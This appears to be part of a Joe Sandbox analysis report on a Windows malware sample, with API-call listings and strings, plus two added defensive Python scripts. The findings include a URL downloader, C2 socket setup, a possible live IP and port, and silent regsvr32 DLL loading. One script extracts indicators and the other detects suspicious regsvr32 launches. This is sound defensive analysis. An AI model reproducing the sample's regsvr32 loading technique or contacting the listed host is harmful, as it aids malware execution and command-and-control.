                                                                                    • TranslateMessage.USER32(?), ref: 00CD1879
                                                                                    • DispatchMessageW.USER32(?), ref: 00CD1883
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                    • String ID: URLDownloader$wpsv.5.6.3.exe
                                                                                    • API String ID: 3953380684-244475150
                                                                                    • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                    • Instruction ID: 7ddb1fa807b22b4d36432a7fac7ff41a6bfc2d806b3c88c074d83b3bbedb89c7
                                                                                    • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                    • Instruction Fuzzy Hash: 78711CB1D00258EFEB14DFA8CC85BDDBBB4EF48700F10816AE609AB280E7749A45DF51
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00CE548A
                                                                                    • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 00CE54D1
                                                                                    • WSACleanup.WS2_32 ref: 00CE54E0
                                                                                    • socket.WS2_32(?,?,?), ref: 00CE5529
                                                                                    • WSACleanup.WS2_32 ref: 00CE553D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                    • String ID:
                                                                                    • API String ID: 2560534018-0
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: a3b182eb645ff2cb42151abe405b60b8ae5a3ad241c46a5b628835be6c01947f
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: D06117B1904629EFE704CFA9CD88FAD77B5FB08309F108659E519A72A0D734DA40CF65
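The two WSAStartup/getaddrinfo/socket entries above carry the same Opcode ID (e95435a8…), once in the PE-backed region at offset 10000000 and once in the region at 00CD0000 that the report marks "based on PE: false", and only the first copy has its getaddrinfo arguments resolved to a literal host and port (154.82.85.107, 18852). The following Python is an added example, not part of the Joe Sandbox report: it parses API-call listings in the format shown on this page, pulls out getaddrinfo host/port pairs as network IOCs, finds the WSAStartup→getaddrinfo→socket bootstrap sequence, and flags Opcode IDs that occur both in a PE-backed region and in unbacked memory. The listing it parses is constructed here from lines copied from those two entries; the function and variable names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample input: lines copied from the two report entries above
# (same function at two addresses, one PE-backed, one not).
SAMPLE = """\
APIs
• WSAStartup.WS2_32(00000202,?), ref: 100154B3
• getaddrinfo.WS2_32(154.82.85.107,18852,?,00000000), ref: 100154FA
• WSACleanup.WS2_32 ref: 10015509
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
• socket.WS2_32(?,?,?), ref: 10015552
• WSACleanup.WS2_32 ref: 10015566
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
APIs
• WSAStartup.WS2_32(00000202,?), ref: 00CE548A
• getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 00CE54D1
• WSACleanup.WS2_32 ref: 00CE54E0
• socket.WS2_32(?,?,?), ref: 00CE5529
• WSACleanup.WS2_32 ref: 00CE553D
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
• Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no args);
# "Part of subcall function X:" prefixes are tolerated and dropped.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SOURCE_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
OPCODE_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")
IPV4_RE = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def parse_entries(text):
    """Split a listing into per-function entries, one per 'APIs' header."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "offset": None, "pe_backed": None, "opcode_id": None}
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            current["apis"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": [a.strip() for a in args.split(",")] if args is not None else [],
                "ref": m.group("ref").upper(),
            })
            continue
        m = SOURCE_RE.search(line)
        if m:
            current["offset"] = m.group("offset").upper()
            current["pe_backed"] = m.group("pe") == "true"
            continue
        m = OPCODE_RE.search(line)
        if m:
            current["opcode_id"] = m.group("id")
    return entries


def network_iocs(entries):
    """(host, port, region offset) for getaddrinfo calls whose first two
    arguments were recovered as a literal IPv4 address and a numeric port.
    Pointer-valued arguments (e.g. 1001C0E0) are ignored, not guessed."""
    iocs = []
    for e in entries:
        for call in e["apis"]:
            if call["name"] != "getaddrinfo" or len(call["args"]) < 2:
                continue
            host, service = call["args"][0], call["args"][1]
            if IPV4_RE.match(host) and service.isdigit():
                iocs.append((host, int(service), e["offset"]))
    return iocs


def c2_bootstrap_regions(entries):
    """Offsets of regions whose function calls WSAStartup, getaddrinfo and
    socket in that order (the client-side socket setup seen above)."""
    wanted = ("WSAStartup", "getaddrinfo", "socket")
    hits = []
    for e in entries:
        it = iter(c["name"] for c in e["apis"])   # ordered subsequence check
        if all(w in it for w in wanted):
            hits.append(e["offset"])
    return hits


def duplicated_in_unbacked_memory(entries):
    """Opcode IDs present both in a PE-backed region and in a region with no
    backing PE: the same code mapped a second time outside any loaded image."""
    by_id = defaultdict(set)
    for e in entries:
        if e["opcode_id"] and e["offset"]:
            by_id[e["opcode_id"]].add((e["offset"], e["pe_backed"]))
    result = {}
    for oid, places in by_id.items():
        backed = sorted(off for off, pe in places if pe)
        unbacked = sorted(off for off, pe in places if not pe)
        if backed and unbacked:
            result[oid] = {"pe_backed": backed, "unbacked": unbacked}
    return result


if __name__ == "__main__":
    entries = parse_entries(SAMPLE)
    print("network IOCs:", network_iocs(entries))
    print("socket bootstrap in regions:", c2_bootstrap_regions(entries))
    print("code duplicated into unbacked memory:", duplicated_in_unbacked_memory(entries))
```

Running it on the two entries reports 154.82.85.107:18852 as the only resolvable IOC, both regions as containing the socket bootstrap, and the shared Opcode ID as present once in the DLL image and once in unbacked memory at 00CD0000, which is what a practitioner would want to confirm before treating the 00CD0000 region as a manually mapped copy of the DLL rather than a separate component.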
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0061AD63
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0061AD7F
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 0061AD8D
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 0061AD9E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061ADE5
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061AE01
                                                                                    Strings
                                                                                    • Helper process exited., xrefs: 0061ADAD
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 0061ADCB
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0061ADD7
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0061AD55
                                                                                    • Helper isn't responding; killing it., xrefs: 0061AD6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00CD1A3B,00CD1A3D,00000000,00000000,r<e,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6F00
• MultiByteToWideChar.KERNEL32(00000000,00000000,00CD1A3B,?,00000000,00000000,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B), ref: 00CE6F7B
• SysAllocString.OLEAUT32(00000000), ref: 00CE6F86
• _com_issue_error.COMSUPP ref: 00CE6FAF
• _com_issue_error.COMSUPP ref: 00CE6FB9
• GetLastError.KERNEL32(80070057,r<e,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6FBE
• _com_issue_error.COMSUPP ref: 00CE6FD1
• GetLastError.KERNEL32(00000000,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6FE7
• _com_issue_error.COMSUPP ref: 00CE6FFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID: r<e
• API String ID: 1353541977-3210016143
APIs
  • Part of subcall function 005F89FC: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
  • Part of subcall function 005F89FC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
• CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EDFF
• SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EE26
• SetWindowLongW.USER32(?,000000FC,0064E478), ref: 0064EE60
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000,00000000), ref: 0064EE95
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0064EF09
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000), ref: 0064EF17
  • Part of subcall function 005F8EF4: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
• DestroyWindow.USER32(?,0064EF3A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000), ref: 0064EF2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 1779715363-2312673372
APIs
• CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,0061B1BF,?,00000000,0061B21A,?,?,?,00000000), ref: 0061B039
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B096
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B0A3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 0061B0EF
• GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B119
• GetLastError.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B120
  • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B1583
  • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
• RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B15D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00407119
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040711F
• GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 00407132
• GetLastError.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 0040713B
• GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,00000000,004071B2,?,00000000,005B1257,GetLogicalProcessorInformation), ref: 00407166
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
• String ID: @$GetLogicalProcessorInformation$kernel32.dll
• API String ID: 1184211438-79381301
APIs
• RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040ED98
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• __RTC_Initialize.LIBCMT ref: 1001650A
• ___scrt_uninitialize_crt.LIBCMT ref: 10016524
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
                                                                                    • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                    • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                    • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                    • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                    APIs
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00619D70,?, /s ",0066978C,regsvr32.exe",?,00619D70), ref: 00619CDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction ID: 91a7d65596da60d3ab410b317687a4738a38aed02517376cad794b957d245f8b
                                                                                    • Opcode Fuzzy Hash: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction Fuzzy Hash: A5413F70E0024C9BDB14EFE5D892ADDBBBAAF49304F64407EE504B7282D7746E44CB65
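The function above carries the strings "Spawning 32-bit RegSvr32: ", "Spawning 64-bit RegSvr32: ", "/s ", "/u" and "regsvr32.exe\"" next to CreateProcess and GetSystemDirectoryW, i.e. it builds a `regsvr32.exe /s "<dll>"` command line and launches the signed system binary to load a DLL silently. The following is an added detection example written for this report, not code from the sample or from Joe Sandbox: it scores process-creation records for regsvr32 launches whose DLL or parent lives outside the system directories. The events, the payload path and the parent path are constructed for illustration and are not taken from the sandbox run.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Directories where regsvr32.exe itself and legitimately registered system DLLs live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields named after Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


def split_windows_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line: whitespace separates tokens, double quotes group them."""
    tokens = [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]
    return [tok for tok in tokens if tok]


def regsvr32_reasons(ev: ProcEvent) -> list[str] | None:
    """None if the image is not regsvr32.exe; otherwise the list of reasons the launch is suspicious
    (empty list = looks like ordinary system use)."""
    if not ev.image.lower().endswith("\\regsvr32.exe"):
        return None
    argv = split_windows_cmdline(ev.command_line)
    switches = {a[1:].lower() for a in argv[1:] if a.startswith(("/", "-"))}
    targets = [a for a in argv[1:] if not a.startswith(("/", "-"))]
    reasons: list[str] = []
    if "s" in switches and "u" in switches:
        reasons.append("silent unregister (/s /u)")
    for dll in targets:
        if not dll.lower().startswith(SYSTEM_DIRS):
            reasons.append(f"DLL outside the system directories: {dll}")
    if not ev.parent_image.lower().startswith(SYSTEM_DIRS):
        reasons.append(f"launched by a non-system parent: {ev.parent_image}")
    if "s" in switches and reasons:
        # /s suppresses the DllRegisterServer result dialog, so the user sees nothing.
        reasons.insert(0, "silent mode (/s) hides the registration result")
    return reasons


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that regsvr32_reasons() flags."""
    hits = []
    for i, ev in enumerate(events):
        reasons = regsvr32_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not from the sandbox run). The first mirrors the command line
# the sample's strings describe, launched from a user-writable path; the paths are hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\leBwnyHIgx.exe",
              r"C:\Windows\SysWOW64\regsvr32.exe",
              r'regsvr32.exe /s "C:\Users\user\AppData\Local\Temp\payload.dll"'),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Windows\System32\msxml3.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe"),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for line in why:
            print("   -", line)
```

The heuristic deliberately treats a system DLL registered by a system parent as benign; the signal the sample gives is the combination of `/s`, a DLL in a user-writable directory and a parent that is itself an unsigned dropper.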
                                                                                    APIs
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                    • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 1504536088-3916222277
                                                                                    • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                    • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                    • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                    • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,00000000,02453360,0040763A,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257,00000000), ref: 004043A2
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,02453360,0040763A,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 004043BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
